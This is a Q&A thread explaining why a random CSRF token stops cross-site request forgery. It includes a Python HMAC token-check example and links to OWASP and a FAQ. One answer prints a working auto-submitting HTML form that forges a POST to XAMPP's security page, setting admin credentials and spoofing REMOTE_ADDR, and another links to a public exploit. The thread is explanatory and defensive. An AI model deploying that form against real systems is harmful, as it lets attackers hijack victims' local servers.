Why can a CSRF attack be prevented by a random CSRF secret?

"To prevent CSRF attacks, a random CSRF secret is generated."

The above is from the symfony docs: http://www.symfony-project.org/getting-started/1_4/en/04-Project-Setup

Since the request is ultimately made by the user's own browser, this is the so-called confused deputy attack. How does setting this secret prevent it?

+3

4 answers

OWASP (Open Web Application Security Project) has a very good explanation of CSRF; I recommend that you read it and then ask your questions.

http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Django's CSRF documentation is also worth looking at: http://docs.djangoproject.com/en/dev/ref/contrib/csrf/

+1

CSRF, also written XSRF, stands for Cross-Site Request Forgery. The attacker makes the victim's browser issue an HTTP request "on the victim's behalf", using html and javascript. Here is an example of CSRF against XAMPP: an html/js page that submits a POST as the victim. The CSRF against XAMPP's security page looks like this:

<!-- Auto-submitting form: when the victim's browser loads this page, it POSTs
     to the XAMPP security page with whatever cookies/credentials the victim has. -->
<html>
    <body>
    <form action="http://127.0.0.1/security/xamppsecurity.php" method="POST" id="1">
        <!-- Presumably sets $_SERVER['REMOTE_ADDR'] when register_globals is on,
             so a localhost-only check passes (assumed purpose of this field). -->
        <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
        <input type="hidden" name="xamppuser" value="admin">
        <input type="hidden" name="xampppasswd" value="password">
        <input type="hidden" name="xamppaccess" value="Make+safe+the+XAMPP+directory">
        <input type="submit">
    </form>
    <script>
        // Submit immediately; no user interaction needed.
        document.getElementById("1").submit();
    </script>
    </body>
</html>

If the victim opens this page while logged in, the request goes through: the browser attaches the session cookie or basic-auth credentials by itself. A random token that the attacker's page cannot know is what stops this. The token CAN be defeated, though, with XSS. Here is an example combining CSRF with XSS: http://www.milw0rm.com/exploits/7922

+1
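To make the mechanism concrete, here is an added example (not code from the thread, and not Symfony's or XAMPP's own implementation; Symfony's actual token derivation differs in detail). It models the server side of the XAMPP-style form above: a token derived with HMAC from a server-side secret and the victim's session id is embedded in the legitimate form, and the handler refuses any POST whose token does not match. The function names, the form name "xamppsecurity" and the request shape are assumptions made for this illustration.

```python
"""Minimal model of a CSRF secret at work (added example, not from the page).

The browser attaches the victim's session cookie to every POST, forged or not,
so the session alone cannot tell a real submission from an attacker's
auto-submitting form. A token that depends on a server-side secret can: the
attacker's page neither knows the secret nor can it read the victim's page.
"""
import hashlib
import hmac
from typing import Optional

# Stand-in for Symfony's csrf_secret. Constructed for the demo; in practice a
# long random value that never appears in any page served to clients.
CSRF_SECRET = b"constructed-demo-secret-do-not-reuse"

FORM_NAME = "xamppsecurity"  # assumed form identifier


def make_token(secret: bytes, session_id: str, form_name: str) -> str:
    """Token = HMAC-SHA256(secret, session_id || form_name).

    Binding to the session means a token leaked from one user's page is
    useless against another user; binding to the form name keeps a token for
    a harmless form from being replayed against a sensitive one."""
    msg = f"{session_id}:{form_name}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def check_token(secret: bytes, session_id: str, form_name: str,
                submitted: Optional[str]) -> bool:
    """Recompute and compare in constant time. Missing token => reject."""
    if not submitted:
        return False
    expected = make_token(secret, session_id, form_name)
    return hmac.compare_digest(expected, submitted)


def handle_post(session_id: str, form: dict) -> str:
    """Stand-in for the request handler. `session_id` comes from the cookie
    the browser sent, which is always the victim's real session, even for a
    request the attacker's page triggered."""
    if not check_token(CSRF_SECRET, session_id, FORM_NAME, form.get("_csrf_token")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: password for {form['xamppuser']} changed"


def demo():
    """Three submissions under the victim's session: genuine, forged without a
    token, and forged with a token computed from a guessed secret."""
    victim_session = "s-victim-123"

    # Legitimate page render: the server embeds the real token in the form.
    genuine = {
        "xamppuser": "admin",
        "xampppasswd": "password",
        "_csrf_token": make_token(CSRF_SECRET, victim_session, FORM_NAME),
    }
    # Attacker's auto-submitting form: same fields as the PoC, no token,
    # because the attacker's page has no way to obtain it.
    forged = {"xamppuser": "admin", "xampppasswd": "password"}
    # Attacker guesses a secret: wrong secret => wrong MAC => rejected.
    guessed = dict(forged, _csrf_token=make_token(b"attacker-guess", victim_session, FORM_NAME))

    return (
        handle_post(victim_session, genuine),
        handle_post(victim_session, forged),
        handle_post(victim_session, guessed),
    )


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The point of the HMAC is only that the attacker cannot compute the token without the secret; a purely random per-session token stored server-side works just as well, and is what many frameworks do. Note what this does not cover: if the attacker can run script on the site itself (XSS), that script is same-origin, can read the token out of the rendered form and submit it, which is exactly the bypass the answer above refers to.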

cgisecurity has a CSRF FAQ (http://www.cgisecurity.com/csrf-faq.html). The answer to your question is in that FAQ.

EDIT: the relevant point from the CSRF FAQ, in short:

A random token works against CSRF because the attacker's page cannot obtain it, so the forged request cannot include it. The FAQ also notes that an XSS vulnerability on the same site defeats this protection, since injected script can read the token.

0

Symfony's CSRF secret is well explained here: http://www.nacho-martin.com/csrf-tokens-in-symfony

0

Source: https://habr.com/ru/post/1730499/
